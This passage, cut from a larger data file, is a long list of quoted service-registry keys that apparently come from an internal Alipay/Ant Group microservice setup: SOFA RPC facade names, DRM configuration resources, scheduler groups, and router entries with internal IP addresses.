EFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.ExchangeCertificateManagerAlscFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.biz.commodities.event.CommoditiesAccorderEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.CountControlCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.133.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecashier_cctb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_BP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.wireless.IsvCorpSuiteAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.destCheckLevelRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:aaaaasasa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.innertrans.facade.api.InnerAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ArBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.DiscountTemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-publichome-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.risk.BizTraceMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.AuditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_COD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.searchportal.common.service.facade.appcenter.SchSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.resourceDrillCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.31.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianmerchant.common.service.api.InsMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insmobile.evaluateAppDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.MocOrderOutputService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.assistinvestigate.deducttask.facade.DeductTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.prodcenter.common.service.facade.query.api.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.job.common.service.facade.api.RepeatableJobOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.70.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_access_integrationListTemplateGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.null:name=com.antcloud.ifcidentitycloud.common.service.facade.mic.drm.impl.VerifyCutOverServiceImpl.sceneConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbticketcenter.common.service.facade.api.TicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.FluxProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthhottwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@smamlmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.ifinmng.service.facade.ctrl.RegistrationSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:iguardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.manage.facade.api.AppletManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.almcenter.service.facade.api.AlmCredibleFactorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zdatafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_arStateValidCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.biz.rpc.task.AlipayPointTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.RelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:secuinfos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_123#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsoc.service.facade.api.config.center.ServiceDeployQueryService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.biz.customized.spi.EventInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1213#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mquery.common.service.facade.kb.KbPromoDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-trisktcc-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilerc.common.service.facade.aggregation.AggregationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.base.manager.EinvGlobalUniqueManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SimulateModeFixedData2NewDrmImpl.simulateModeSceneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.settlementprod.common.service.facade.api.EcologyPointDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessRejectCallbackNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.repay.CurrentRepayPlanQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_REVCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mypointsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.MonitorSubMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fporgassetcenter-all#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebill.service.facade.MrchDataAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkperf.common.service.facade.process.service.ThubAtomServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.RechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.InsttradeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.fpc.rpc.FollowRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.indicator.IndicatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.reload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilecashier:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iexchange.service.inner.accounting.RecoveryAccountingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkinterbankcenter_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditguarantee.common.service.facade.GuaranteeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.ItemTransServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.merchant.MerchantDstCampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:memberexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cifin_cifObDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.core.service.component.drm.LDCCacheSyncSwitchDrmResource.isFirstPayPutLocalCacheProxyToCif,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.open.activity.ActivityCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmImgElementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.ScheduleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.OssDataSourceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.permlimit.nearshare.facade.RuleModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_7300#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.marketing.facade.promotion.service.manager.MarketingActivityTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.report.ReportTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.meta.FundMetaTableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.isOpenFixedRedeem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.invoicecommercial.facade.api.ForeseeAuthCalllbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:psslipDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clrfinancing.facade.api.LoanSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ASSET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.76.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_MQ_HTTP_PROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiConnFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmng.common.service.ActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_B_PORTAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.datacontext.common.service.facade.limitcum.api.FcCumulateStoreFacade:1.0:ifcdatacontextCumulateStore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloandecision.service.facade.consult.CreditConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insliveprod.common.service.facade.EventMgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.datafin.biz.share.sql.UploadSqlManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.BatchRefundDetailResultFixResource.batchRefundIds,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","csassistant@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.184.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegeocoding.common.service.facade.MarketingBizAreaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbizlink.common.service.facade.api.InstLinkRuleLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tbfcore.facade.code.SPIOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitymegadatacalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.app.BatchModifyPublicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.aliyun.apsarabase.euler.meta.service.facade.api.AppInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskxm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathWhiteListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mmtcaftscv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.censor.CensorRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.hpa.ManualProcessLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcrccenter.common.service.facade.OssFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:inspect_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.obstaclemap.core.engine.api.facade.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.InstKeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_REFUNDBILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilelbs.common.service.facade.weather.RealWeatherServiceInCzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securityexprod.biz.alipayauth.service.MyBankEwcManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.MessageService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundPeriodAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.staff.DingTalkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finboss.common.service.facade.yeb.YebUserAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtask.common.service.facade.RigelSceneConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprofile.facade.dqs.api.IProfilePropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.CategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_5_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.1.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.92.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:fluxnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MarketActivityFundcoacherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.PcbfcoreTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fapcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.charityprod.commom.service.facade.CharityPicPathGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pubcicadaruntime@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:darwin_LR_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.filestore.api.GptFileStoreInformationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.cds.facade.FrameGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agds.sd.facade.service.AgdsApplyDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@emcooperate#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditauthasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.com.service.facade.api.NearbyMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventcomputeversion.EventComputeVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.MerchantSettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.annualaudit.AnnualAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpStateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iinnertrans.facade.api.InnerAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsApplicationAcceptanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.60.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppprod.common.service.facade.recharge.RechargeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizcenter.common.service.facade.api.BizGoodsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.calendar.CalendarDetailQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.msgFatigueDegreeItem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.ldc.api.TransferRProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adame.facade.query.AdameDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstprod.common.service.facade.api.orgdecision.OrgPerferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.CheckerCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:reservecenterDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.icl.AbnormalTradeMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydss.common.service.zscaleplugin.facade.service.AlarmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.SiteProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arulemng.common.service.facade.rulefile.RuleFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.antcheck.StrategyPlatformCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:presetAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvSignupTaskService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.envroute.EnvRouterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.AllocateCommFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.common.t